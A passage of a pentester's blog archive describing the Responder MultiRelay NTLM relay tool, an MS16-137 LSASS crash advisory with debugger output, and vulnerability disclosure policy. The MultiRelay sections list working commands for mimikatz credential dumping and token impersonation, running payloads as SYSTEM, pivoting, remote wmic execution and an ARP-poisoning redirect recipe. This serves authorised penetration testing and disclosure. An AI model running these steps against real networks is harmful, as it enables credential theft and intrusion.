Earlier versions of MultiRelay used this Python script compiled with pyinstaller, which generated a pretty big file from a 5-line Python script... <a href="https://twitter.com/gentilkiwi" target="_blank">@gentilkiwi</a> jumped in and said "I think I can do way better", and he did.<br />
@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options and the ability to run mimikatz as a service, and he also took care of bringing Runas.exe down to a decent size of 9k while I was working on the Mimikatz RPC client and all the other MultiRelay functionalities.</div>
<div style="text-align: left;">
<br />
These new Mimikatz functionalities allow MultiRelay to interact stealthily with Mimikatz and use, without restriction, all of the power this awesome tool gives us. </div>
<h3 style="text-align: left;">
MultiRelay 2.0 Wushu: </h3>
<div style="text-align: left;">
Below are listed some post exploitation attack examples:</div>
<ul style="text-align: left;">
<li>Mimikatz RPC:<br />Get all available tokens, impersonate one user and run a command as this user:<br /><ul>
<li>C:\Windows\system32\:#mimi token::list </li>
<li>C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run</li>
</ul>
<ul>
<li>C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami</li>
</ul>
Get all logon passwords:<br /><ul>
<li>mimi sekurlsa::logonpasswords</li>
</ul>
Etc. All regular mimikatz commands are available on the RPC interface.<br /></li>
<li>Upload your custom mimikatz or payload and run it:<br />Upload an executable and launch it from Windows/Temp/ as system. <br /><ul>
<li> C:\Windows\system32\:#upload path/to/mimikatz.exe</li>
<li> C:\Windows\system32\:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit </li>
</ul>
<u>The exit command is very important</u> with mimikatz: if you don't use it, mimikatz will stay loaded and <u>the command will fail</u>.<br />Note: If you need to run your executable as the currently logged in user, use:<ul>
<li>C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args</li>
</ul>
Now delete the file:<br /><ul>
<li>C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe</li>
</ul>
</li>
<li>Scan the current class C and pivot to another host:<br />
<ul>
<li>C:\Windows\system32\:#scan /24<blockquote class="tr_bq">
...[snip]...<br />
['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']<br />
['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />
['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']<br />
['192.168.1.145', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />
...[snip]...</blockquote>
</li>
</ul>
<ul>
<li> C:\Windows\system32\:#pivot 192.168.1.145<br /><blockquote class="tr_bq">
[+] Pivoting to 192.168.1.145.<br />
Connected to 192.168.1.145 as LocalSystem.</blockquote>
</li>
</ul>
</li>
<li>Run a command as the currently logged in user:<br /><ul>
<li>C:\Windows\system32\:#runas whoami<blockquote class="tr_bq">
smb3\lgandx </blockquote>
</li>
</ul>
</li>
<li>Execute commands on the PDC remotely and read the output:<br /><ul>
<li>Mount the PDC C:\ drive:</li>
<li>C:\Windows\system32\:#runas net use g: \\smb3.local\c$<br /><blockquote class="tr_bq">
The command completed successfully.</blockquote>
</li>
<li>C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"<blockquote class="tr_bq">
Executing (Win32_Process)->Create()<br />
Method execution successful.<br />
Out Parameters:<br />
instance of __PARAMETERS<br />
{<br />
ProcessId = 1068;<br />
ReturnValue = 0;<br />
};</blockquote>
</li>
</ul>
<ul>
<li>Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt</li>
<li>C:\Windows\system32\:#runas more g:\results.txt<br /><blockquote class="tr_bq">
smb3\lgandx </blockquote>
</li>
</ul>
<br />
These are just a few examples of what MultiRelay allows you to accomplish in a Windows Active Directory environment; for the rest, it's up to your imagination.<br />
<br />
</li>
</ul>
<h3>
Final Words: The donation campaign</h3>
I work as an independent contractor/pentester and I get pretty busy these days. When I work on Responder, I end up working for free for the community and losing money I could make with my contracts, especially when a set of new functionalities or research takes up to a month, full time.<br />
<br />
Therefore a donation campaign was launched a few months ago in order to get some funding for this project, and I think it was a success. More than 50 pentesters around the world and 3 companies donated to this project, therefore supporting the development of this set of free tools used in your everyday internal pentests.<br />
<br />
I would like to thank all the independent penetration testers who donated and these 3 companies:<br />
<ul>
<li>SecureWorks : <a href="https://www.secureworks.com/">https://www.secureworks.com/</a></li>
</ul>
<ul>
<li>Black Hills Information Security: <a href="http://www.blackhillsinfosec.com/">http://www.blackhillsinfosec.com/</a></li>
</ul>
<ul>
<li>TrustedSec: <a href="https://www.trustedsec.com/">https://www.trustedsec.com/</a></li>
</ul>
And all, ALL the pentesters around the world who donated to this project.</div>
<div>
Your donations made this version happen.</div>
<div>
</div>
<div>
Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:<br />
<a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a></div>
<div>
<br /></div>
<div>
Happy hacking!</div>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-65963656003817327002016-11-08T14:07:00.000-08:002016-11-08T14:32:46.381-08:00MS16-137: LSASS Remote Memory Corruption Advisory<div dir="ltr" style="text-align: left;" trbidi="on">
Title: LSASS SMB NTLM Exchange Remote Memory Corruption<br />
Version: 1.0<br />
Issue type: Null Pointer Dereference<br />
Authentication: Pre-Authenticated<br />
Affected vendor: Microsoft<br />
Release date: 8/11/2016<br />
Discovered by: Laurent Gaffié<br />
Advisory by: Laurent Gaffié<br />
Issue status: Patch available<br />
Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10. <br />
=================================================<br />
<br />
A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.<br />
Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.<br />
Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.<br />
<br />
<br />
Technical details<br />
-----------------<br />
<br />
This vulnerability affects both the LSASS client and server side, and can be triggered remotely over SMBv1 and SMBv2 during NTLM message 3 (AUTHENTICATE_MESSAGE). NTLM messages carried over SMB are wrapped in ASN.1 DER (the SPNEGO token of the session setup); the first ASN.1 length field can be switched to the long form with 0x84, which declares the length in the following four bytes as an unsigned 32-bit integer.<br />
This lets an attacker make LSASS allocate a huge chunk of memory for a message that is never larger than 20000 bytes. The secondary trigger is to fill any of the variable-length fields (User, Domain, Session Key, MIC, etc.) with a long string (80-140 characters), leading LSASS.exe to crash.<br />
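The length-field mechanism described above, as an added example that is not part of the advisory or of the PoC repository. DER long-form length semantics come from X.690 (a first octet of 0x84 means "length follows in 4 bytes"); the 20000-byte ceiling is taken from the advisory's statement about the largest legitimate message; the sample tokens and all function names are constructed for this illustration. The point is the check a parser needs: the declared length must be compared against the bytes actually present before anything is allocated.

```python
"""Added example: DER length decoding, naive vs. checked.

A client controls the length octets of the SPNEGO token it sends. With
0x84 it can declare a 32-bit length that has nothing to do with the
bytes on the wire. decode_der_length_unchecked() trusts that value;
decode_der_length_checked() validates it. Sample tokens are constructed.
"""
from typing import Optional, Tuple

MAX_TOKEN_LEN = 20000  # assumed ceiling, from the advisory's "never larger than 20000"


def encode_der_length(n: int, force_width: Optional[int] = None) -> bytes:
    """Encode a length. With force_width, emit the long form in exactly that
    many bytes even when a shorter encoding exists (what a hostile client
    does to put a 0x84 prefix in front of a small body)."""
    if force_width is not None:
        return bytes([0x80 | force_width]) + n.to_bytes(force_width, "big")
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def decode_der_length_unchecked(buf: bytes, pos: int) -> Tuple[int, int]:
    """Naive decoder: (declared_length, content_offset), trusting the sender.
    A caller that allocates declared_length bytes is the pattern the
    advisory describes."""
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    width = first & 0x7F
    return int.from_bytes(buf[pos + 1:pos + 1 + width], "big"), pos + 1 + width


def decode_der_length_checked(buf: bytes, pos: int, ceiling: int = MAX_TOKEN_LEN) -> Tuple[int, int]:
    """Hardened decoder. Rejects the indefinite form, length fields wider
    than 4 bytes, non-minimal encodings (not DER), lengths above the
    protocol ceiling, and lengths exceeding the bytes actually present."""
    if pos >= len(buf):
        raise ValueError("truncated: no length octet")
    first = buf[pos]
    if first < 0x80:
        length, content = first, pos + 1
    else:
        width = first & 0x7F
        if width == 0:
            raise ValueError("indefinite length is not DER")
        if width > 4:
            raise ValueError("length field wider than 4 bytes")
        if pos + 1 + width > len(buf):
            raise ValueError("truncated length field")
        length = int.from_bytes(buf[pos + 1:pos + 1 + width], "big")
        content = pos + 1 + width
        if length < 0x80 or length >> (8 * (width - 1)) == 0:
            raise ValueError("non-minimal length encoding is not DER")
    if length > ceiling:
        raise ValueError(f"declared length {length} exceeds ceiling {ceiling}")
    if content + length > len(buf):
        raise ValueError(f"declared length {length} but only {len(buf) - content} bytes present")
    return length, content


def hostile_token(body_len: int = 200, declared: int = 0xFFFFFFFF) -> bytes:
    """Constructed sample: a SEQUENCE (tag 0x30) whose length octets are
    0x84 plus a 32-bit value, followed by a body far smaller than declared."""
    return b"\x30" + encode_der_length(declared, force_width=4) + b"A" * body_len


def honest_token(body_len: int = 200) -> bytes:
    """Constructed sample with a minimal DER length, for comparison."""
    return b"\x30" + encode_der_length(body_len) + b"A" * body_len


if __name__ == "__main__":
    print("unchecked:", decode_der_length_unchecked(hostile_token(), 1))
    try:
        decode_der_length_checked(hostile_token(), 1)
    except ValueError as err:
        print("checked:", err)
```

Run it as-is to see the naive decoder hand back a 4 GiB length for a 206-byte token while the checked one refuses it; the same validation applies to every nested length inside the token, not only the outermost one.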
<br />
eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004<br />
eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213<br />
ntdll!RtlpWaitOnCriticalSection+0xdf:<br />
7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????<br />
<br />
STACK_TEXT: <br />
00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf<br />
00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer<br />
00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds.<br />
00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9<br />
00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a<br />
00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344<br />
00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139<br />
00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b<br />
00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46<br />
00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe<br />
00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9<br />
00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91<br />
00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34<br />
<br />
dt ntdll!_RTL_CRITICAL_SECTION<br />
+0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG<br />
+0x004 LockCount : Int4B<br />
+0x008 RecursionCount : Int4B<br />
+0x00c OwningThread : Ptr32 Void<br />
+0x010 LockSemaphore : Ptr32 Void<br />
+0x014 SpinCount : Uint4B<br />
<br />
- lsasrv!NegpBuildMechListFromCreds passes a null "creds" pointer to ntdll!RtlEnterCriticalSection.<br />
- RtlEnterCriticalSection then dereferences it: with eax=0, the "inc dword ptr [eax+14h]" shown above writes to address 0x14, which is unmapped, and LSASS crashes.<br />
<br />
Impact<br />
------<br />
<br />
Successful attempts will result in a remote system crash and possibly local privilege escalation.<br />
<br />
Affected products<br />
-----------------<br />
<br />
Windows:<br />
- XP<br />
- Server 2003<br />
- 7<br />
- 8<br />
- 2008<br />
- 2012<br />
- 10<br />
<br />
Proof of concept<br />
----------------<br />
<br />
A proof of concept is available at the following URL:<br />
https://github.com/lgandx/PoC/tree/master/LSASS<br />
This proof of concept is fully automated and includes non-vulnerable detection.<br />
<br />
Solution<br />
--------<br />
<br />
Install the corresponding MS patch.<br />
More details:<br />
https://technet.microsoft.com/en-us/library/security/ms16-137.aspx<br />
<br />
Response timeline<br />
-----------------<br />
<br />
* 17/09/2016 - Vendor notified, proof of concept sent.<br />
* 28/09/2016 - Issue confirmed by MSRC.<br />
* 14/10/2016 - Vendor says it plans to release a patch in November, <u><b>that is 1 month ahead of the scheduled 3-month deadline.</b></u><br />
* 08/11/2016 - Vendor releases MS16-137.<br />
* 08/11/2016 - This advisory released.<br />
<br />
References<br />
----------<br />
* https://twitter.com/PythonResponder<br />
* https://github.com/lgandx/Responder</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com12tag:blogger.com,1999:blog-3247452330105635425.post-34527479554270175202016-10-13T13:01:00.000-07:002016-10-13T14:31:13.255-07:00Introducing Responder MultiRelay 1.0<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
MultiRelay Description:</h4>
<div style="text-align: left;">
<a href="https://github.com/lgandx/Responder" target="_blank">MultiRelay</a> is a powerful pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Currently MultiRelay relays HTTP, WebDav, Proxy and SMB authentications to an SMB server. </div>
<div style="text-align: left;">
This tool can be given a list of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.<br />
<br />
Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:</div>
<ul style="text-align: left;">
<li> Remotely dump the LM and NT hashes on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Remotely dump any registry keys under HKLM.</li>
</ul>
<ul style="text-align: left;">
<li>Read any file on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Download any file on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Execute any command as System on the target.</li>
</ul>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
Usage Overview:</h4>
<div style="text-align: left;">
Most of the time, MultiRelay can be run with the following options:</div>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin</li>
</ul>
<div style="text-align: left;">
<br />
MultiRelay comes with a set of 3 options:</div>
<ul style="text-align: left;">
<li>-p: Add an extra listening port for HTTP, WebDav, Proxy requests to relay. </li>
</ul>
<ul style="text-align: left;">
<li>-u: A list of users to relay. -u can also be set to "ALL" to target all users.</li>
</ul>
<ul style="text-align: left;">
<li>-t: The target</li>
</ul>
<div style="text-align: left;">
<br />
MultiRelay will start by fingerprinting your target and tell you if SMB signing is mandatory; if so, it will let you know that you should target another server. A relayed NTLM exchange gives you the client's challenge-response but not the session key, which is derived from the user's password hash, so the relayed session cannot produce valid signatures.<br />
<br />
Another useful utility included in Responder's tools folder is RunFinger.py. RunFinger accepts a single IP address or a /24 range and will tell you the following for a given target:</div>
<ul style="text-align: left;">
<li>Os version</li>
</ul>
<ul style="text-align: left;">
<li>Domain joined</li>
</ul>
<ul style="text-align: left;">
<li>Signing is mandatory or not.</li>
</ul>
<div style="text-align: left;">
<br />
RunFinger can dump this information in a grepable format by using the -g command line switch:<br />
root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24<br />
Which will output something like:<br />
...<br />
[10.10.20.41: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.36: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']<br />
[10.10.20.22: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.43: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.49: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'True']<br />
[10.10.20.35: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']<br />
[10.10.20.40: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
....<br />
This utility is useful for mapping networks and to carefully select a target.</div>
<h4 style="text-align: left;">
Running The Tool, The Common Scenario:</h4>
<div style="text-align: left;">
MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is:</div>
<ul style="text-align: left;">
<li>Set SMB and HTTP to Off in Responder.conf</li>
</ul>
<ul style="text-align: left;">
<li>./Responder.py -I eth0 -rv on one screen</li>
</ul>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount OtherAdmin on another one.</li>
</ul>
<div style="text-align: left;">
<br />
In this scenario all NBT-NS and LLMNR lookups will be resolved by Responder.py to our IP address, and MultiRelay will be listening on TCP ports 80, 3128 and 445, waiting for incoming connections.<br />
<br />
Once a connection is received, MultiRelay will be parsing all authentication requests and will verify if:</div>
<ul style="text-align: left;">
<li>The user authentication is allowed to be relayed on the target.</li>
</ul>
<ul style="text-align: left;">
<li>This user has already been relayed to our target and if the server returned a logon failure.</li>
</ul>
<div style="text-align: left;">
<br />
If this user was previously relayed and the server returned a logon failure, this user will be blacklisted for further authentication.</div>
<div style="text-align: left;">
<br />
This is done to prevent account lockouts. This check can be reset by deleting the SMBRelay-Session.txt file in Responder logs folder.<br />
<br />
Even if a user is not allowed to be relayed, his NTLMv1/v2 sets of credentials will be captured and stored in Responder logs folder as "SMB-Relay-CLIENTIP.txt", so you won't lose any hashes while running MultiRelay.py</div>
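The relay decision described above (user allow-list, "ALL", and the lockout guard that refuses to retry an account the target already rejected), as an added example written for this post and not MultiRelay's own code. The on-disk state file mirrors the role of SMBRelay-Session.txt, but its name and one-entry-per-line format are assumptions; accounts that are out of scope are still reported as capture-only, matching the behaviour described for the SMB-Relay-CLIENTIP.txt files.

```python
"""Added example: relay allow-list plus logon-failure blacklist.

Not MultiRelay's implementation. State file format is assumed:
one "domain\\user" per line, lower-cased.
"""
import os
from typing import Iterable, Optional, Set


class RelayPolicy:
    def __init__(self, allowed_users: Iterable[str], state_file: Optional[str] = None):
        users = {u.lower() for u in allowed_users}   # Windows logon names are case-insensitive
        self.relay_all = "all" in users               # "-u ALL" semantics
        self.allowed: Set[str] = users
        self.state_file = state_file
        self.failed: Set[str] = set()                 # accounts that already got a logon failure
        if state_file and os.path.exists(state_file):
            with open(state_file, encoding="utf-8") as fh:
                self.failed = {line.strip().lower() for line in fh if line.strip()}

    @staticmethod
    def key(domain: str, user: str) -> str:
        return f"{domain}\\{user}".lower()

    def should_relay(self, domain: str, user: str) -> bool:
        """In scope AND not previously rejected by the target. Re-sending a
        response the target already refused is what risks account lockouts,
        so one failure is enough to stop relaying that account."""
        if self.key(domain, user) in self.failed:
            return False
        return self.relay_all or user.lower() in self.allowed

    def decide(self, domain: str, user: str) -> str:
        """'relay' or 'capture-only'; the challenge-response is logged either way."""
        return "relay" if self.should_relay(domain, user) else "capture-only"

    def record_logon_failure(self, domain: str, user: str) -> None:
        """Target answered the relayed AUTHENTICATE with a logon failure:
        remember it, persistently, so a restart does not retry the account."""
        self.failed.add(self.key(domain, user))
        if self.state_file:
            with open(self.state_file, "a", encoding="utf-8") as fh:
                fh.write(self.key(domain, user) + "\n")

    def reset(self) -> None:
        """Equivalent of deleting the session file by hand."""
        self.failed.clear()
        if self.state_file and os.path.exists(self.state_file):
            os.remove(self.state_file)


if __name__ == "__main__":
    policy = RelayPolicy(["Administrator", "DAaccount"])
    print(policy.decide("CORP", "Administrator"))   # relay
    policy.record_logon_failure("CORP", "Administrator")
    print(policy.decide("CORP", "administrator"))   # capture-only
    print(policy.decide("CORP", "bob"))             # capture-only
```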
<h4 style="text-align: left;">
The LLMNR/NBT-NS Disabled Scenario:</h4>
<div style="text-align: left;">
<br />
MultiRelay can also be easily used in combination with ARP poisoning attacks, in this scenario let's assume:</div>
<ul style="text-align: left;">
<li>Switch IP: 10.10.10.254</li>
</ul>
<ul style="text-align: left;">
<li>File server (relay target): 10.10.10.20</li>
</ul>
<ul style="text-align: left;">
<li> Backup file server (ARP poisoning victim): 10.10.10.24</li>
</ul>
<ul style="text-align: left;">
<li> Our IP: 10.10.10.201</li>
</ul>
<div style="text-align: left;">
<br />
After some reconnaissance, we know for a fact that once in a while the backup server syncs with the file server using its Administrator account.<br />
We can therefore set up the following targeted ARP poisoning attack:<br />
<br />
Lets enable IP forwarding.</div>
<ul style="text-align: left;">
<li> echo 1 > /proc/sys/net/ipv4/ip_forward</li>
</ul>
<div style="text-align: left;">
<br />
We will be dropping all outgoing ICMP. This prevents the kernel from sending port/host unreachable messages to our target.</div>
<ul style="text-align: left;">
<li> iptables -A OUTPUT -p ICMP -j DROP</li>
</ul>
<div style="text-align: left;">
<br />
Since all packets will be going through our box, let's rewrite the destination address and port on the fly for all SMB requests destined to 10.10.10.20:445, sending them to our IP 10.10.10.201:445.</div>
<ul style="text-align: left;">
<li>iptables -t nat -A PREROUTING -p tcp --dst 10.10.10.20 --dport 445 -j DNAT --to-destination 10.10.10.201:445</li>
</ul>
<div style="text-align: left;">
Launch MultiRelay:</div>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t 10.10.10.20 -u Administrator</li>
</ul>
<div style="text-align: left;">
<br />
And finally, launch the actual attack, we only target the backup fileshare:</div>
<ul style="text-align: left;">
<li>ettercap -T -q -w AttackDump-01.pcap -p -M arp:remote /10.10.10.254// /10.10.10.24//</li>
</ul>
<h4 style="text-align: left;">
MultiRelay Functionalities:</h4>
<div style="text-align: left;">
Once a relay has been successfull, MultiRelay will let you:</div>
<ul style="text-align: left;">
<li> Dump registry key and subkeys remotely.</li>
</ul>
<div style="text-align: left;">
This is done by making a DCE/RPC call to the Windows Remote Registry pipe, saving the key on the SMB server and finally making a read request to the selected saved key.</div>
<ul style="text-align: left;">
<li> Dump the SAM database remotely.</li>
</ul>
<div style="text-align: left;">
This is done by extracting the bootkey and saving the SAM key locally. Responder includes a version of creddump which will parse and output the hashes.</div>
<ul style="text-align: left;">
<li> Read a file on the target SMB server.</li>
</ul>
<div style="text-align: left;">
Simple SMB read request on a given file.</div>
<ul style="text-align: left;">
<li> Download a file from the SMB server.</li>
</ul>
<div style="text-align: left;">
Same as read file, but we save the output locally.</div>
<ul style="text-align: left;">
<li> Execute a command as system on the server.</li>
</ul>
<div style="text-align: left;">
This one is done by making a DCE/RPC call to the Windows Services Control Manager and remotely creating a service which will run this command:</div>
<ul style="text-align: left;">
<li>cmd.exe /C echo del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt >Filename.bat& cmd.exe /C call Filename.bat&exit</li>
</ul>
<div style="text-align: left;">
That is:</div>
<ol style="text-align: left;">
<li> echo "del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt" into Filename.bat</li>
<li> run Filename.bat and exit.</li>
</ol>
<div style="text-align: left;">
We then make a SMB read request on Results.txt, and we print the output to the user console.<br />
<br />
Download link: <a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a> </div>
<h4 style="text-align: left;">
Thanks:</h4>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>DiabloHorn <a href="https://diablohorn.com/2013/10/24/remote-hash-dumping-no-processes-or-tool-upload-needed/">https://diablohorn.com/2013/10/24/remote-hash-dumping-no-processes-or-tool-upload-needed/</a></li>
</ul>
<ul style="text-align: left;">
<li>Alberto Solino (<a href="https://twitter.com/agsolino" target="_blank">@agsolino</a>) smbrelayx and Impacket: <a href="https://github.com/CoreSecurity/impacket">https://github.com/CoreSecurity/impacket</a></li>
</ul>
<ul style="text-align: left;">
<li>Brendan Dolan-Gavitt (<a href="https://twitter.com/moyix" target="_blank">@moyix</a>): <a href="http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html">http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html</a> and <a href="https://github.com/moyix/creddump">https://github.com/moyix/creddump</a></li>
</ul>
<br /></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com10tag:blogger.com,1999:blog-3247452330105635425.post-52956508974188742742016-09-26T16:57:00.000-07:002016-10-15T15:17:42.117-07:00Status of Submitted Vulnerabilities To MSRC<div dir="ltr" style="text-align: left;" trbidi="on">
This list is intended to give vague information about submitted bugs, but important information about communication process and timeline.<br />
<h4 style="text-align: left;">
Bug Title: Microsoft <span class="_Tgc">Local Security Authority Subsystem Service (<b>LSASS</b>)</span> Remote Memory Corruption.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft <span class="_Tgc">Local Security Authority Subsystem Service (LSASS)</span></li>
<li>Type: Memory Corruption.</li>
<li>Submitted: 15/09/2016</li>
<li>Coordinated disclosure agreement expiration: 15/12/2016.</li>
<li>Notes and updates: <br />-Proof of concept code was sent on 17/09/2016, no confirmations or real updates were received since then.<br />- 28/09/2016: Issue confirmed by MSRC, they are planning on releasing a patch on each affected platform.<br />- MSRC informed the bug submitter that they are planning to release a patch on November 8, 2016, <u>that is a full month in advance of the 3 months deadline.</u> </li>
</ul>
<h4 style="text-align: left;">
Bug Title: SMBv2 Remote Memory Corruption.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft SMBv2.</li>
<li>Type: Memory Corruption.</li>
<li>Submitted: 25/09/2016. </li>
<li>Coordinated disclosure agreement expiration: 25/12/2016.</li>
<li>Notes and updates: <br />- MSRC is currently investigating the issue.<br />- Microsoft confirmed the issue on 28/09/2016. <br />- Bug submitter extended his coordinated disclosure agreement by one more month, due to certain circumstances around this issue.</li>
</ul>
<h4 style="text-align: left;">
Bug Title: Microsoft Active Directory PDC Remote Code Execution.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft Active Directory</li>
<li>Type: Protocol Abuse</li>
<li>Submitted: 09/12/2016</li>
<li>Bug status: Implemented in Responder v2.3.2.2</li>
<li>Notes and updates: <br />- Proof of concept code was sent on 12/09/2016, Microsoft is planning to release a security fix "over the next few months".<br />- Additional proof of concept provided on 02/10/2016 leading to privilege escalation.</li>
</ul>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-57334083920490199012016-09-26T14:27:00.000-07:002016-09-27T05:20:30.912-07:00Reporting Vulnerability Policy<div dir="ltr" style="text-align: left;" trbidi="on">
After several years of actively reporting security bugs to various vendors I came to the following conclusion:<br />
<ul style="text-align: left;">
<li>A vendor will usually sit on a critical bug as long as it can. Response teams like MSRC are particularly good at it. I've seen cases where a critical RCE took more than a year before a patch came out.</li>
</ul>
<ul style="text-align: left;">
<li>While they usually pretend to care about end-users, most of the time a security patch is released when timing is opportunistic. For example, Server side bugs (RDP, AD/SMB, Lync) month is usually June at MSRC:</li>
</ul>
<ol style="text-align: left;">
<li><a href="https://technet.microsoft.com/en-us/library/security/ms16-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms16-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms13-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms13-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms12-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms12-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms11-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms11-jun.aspx</a></li>
</ol>
<ul style="text-align: left;">
<li>We only see how long a vendor took to fix a vulnerability when there's an actual advisory with a timeline. Usually the average time is 7-9 months. </li>
</ul>
<ul style="text-align: left;">
<li>Taking even 6 months to fix a simple length check is simply not acceptable. It doesn't show in any way a commitment for the security of their users.</li>
</ul>
Although I must say that I had the opportunity to work with productive vendors in the past for the same kind of bugs I submitted to MSRC. For example, with Samba's Security team, a technical answer was usually sent within 2 hours after submitting a security bug and was fixed across all their branches within 1 week at most.<br />
<br />
After some constructive discussions with MSRC lately I decided that I don't want to somehow contribute to this scheme and that things need to change.<br />
<br />
Starting today, vulnerabilities already submitted to MSRC <a href="https://g-laurent.blogspot.com/2016/09/status-of-submitted-vulnerabilities-to.html" target="_blank">will be announced publicly</a> (vuln title, criticality, vuln type) on this blog, but no technical details will be provided to the general public until a patch is out or until my vulnerability disclosure policy agreement has been breached (taking more than x months, for example). Users will be able to track the time it takes them to patch a critical issue and will pressure them if they feel the timeline is unfair. Communities are great for that.<br />
<br />
